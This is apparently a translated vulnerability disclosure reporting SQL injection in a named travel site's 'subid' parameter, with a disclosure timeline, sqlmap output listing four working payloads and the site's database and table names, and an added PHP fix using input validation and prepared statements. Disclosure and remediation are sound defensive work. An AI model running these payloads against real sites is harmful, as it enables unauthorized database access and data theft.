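2015-09-07: Details reported to the vendor; awaiting vendor handling
2015-09-07: Vendor confirmed; details disclosed to the vendor only
2015-09-17: Details disclosed to core white hats and experts in related fields
2015-09-27: Details disclosed to regular white hats
2015-10-07: Details disclosed to trainee white hats
2015-10-22: Details disclosed to the public

As the title says.

SQL injection exists at URL: http://www.ailvxing.com/e/visa/index.php/?enews=showsample&subid=59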

[00:12:13] [INFO] resuming back-end DBMS 'mysql'
[00:12:13] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: subid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: enews=showsample&subid=59 AND 8252=8252

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: enews=showsample&subid=59 AND (SELECT 8039 FROM(SELECT COUNT(*),CONCAT(0x7178707671,(SELECT (CASE WHEN (8039=8039) THEN 1 ELSE 0 END)),0x7170706a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 3 columns
    Payload: enews=showsample&subid=-7145 UNION ALL SELECT NULL,NULL,CONCAT(0x7178707671,0x6e6f4e4177536f426967,0x7170706a71)#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: enews=showsample&subid=59 AND SLEEP(5)
---
[00:12:13] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.3, Apache
back-end DBMS: MySQL 5.0
[00:12:13] [INFO] fetching database names
[00:12:13] [INFO] the SQL query used returns 4 entries
[00:12:13] [INFO] resumed: information_schema
[00:12:13] [INFO] resumed: ailvxing2015
[00:12:13] [INFO] resumed: ailvxing_update
[00:12:13] [INFO] resumed: test
available databases [4]:
[*] ailvxing2015
[*] ailvxing_update
[*] information_schema

Database: ailvxing2015
[380 tables]
+----------------------------------+
| alx_alx_accitem                  |
| alx_alx_acckemu                  |
| alx_alx_agent                    |
| alx_alx_booking                  |
| alx_alx_cardname                 |
...... (not all shown)

Filter the input variables.
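
One way to apply the suggested fix to the `subid` parameter, as an added example that is not code from the original report or from the affected site: validate the value as a plain integer and bind it through a prepared statement. The function names, the `sample` table and its columns are assumptions, and an in-memory SQLite database stands in for the site's MySQL so the script runs offline.

```php
<?php
// Added example: hardened handling of the `subid` GET parameter.
// Assumed names (not from the site): parse_subid, fetch_samples, table `sample`.

// Accept only a plain positive decimal number; anything else yields null.
function parse_subid($raw)
{
    // /D stops `$` from matching before a trailing newline.
    if (!is_string($raw) || !preg_match('/^[1-9][0-9]{0,8}$/D', $raw)) {
        return null;
    }
    return (int) $raw;
}

// Bind the validated value as an integer; it never becomes part of the SQL text.
function fetch_samples(PDO $db, $subid)
{
    $stmt = $db->prepare('SELECT id, title FROM sample WHERE subid = :subid');
    $stmt->bindValue(':subid', $subid, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed demo data; the real application would connect to MySQL instead.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE sample (id INTEGER PRIMARY KEY, subid INTEGER, title TEXT)');
$db->exec("INSERT INTO sample (subid, title) VALUES (59, 'demo row')");

// One legitimate value plus constructed inputs shaped like the reported payloads.
$inputs = array(
    '59',
    '59 AND 8252=8252',
    '59 AND SLEEP(5)',
    '-7145 UNION ALL SELECT NULL,NULL,NULL#',
);
foreach ($inputs as $raw) {
    $subid = parse_subid($raw);
    if ($subid === null) {
        echo "rejected: $raw\n"; // a real handler would answer HTTP 400 here
        continue;
    }
    echo "accepted: $raw -> " . count(fetch_samples($db, $subid)) . " row(s)\n";
}
```

The validation and the bound parameter are independent layers: either one alone stops the four payload types listed in the sqlmap output from reaching the query as SQL.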

Severity: High
Vulnerability Rank: 20
Confirmation time: 2015-09-07 10:47
Thank you very much!
None for now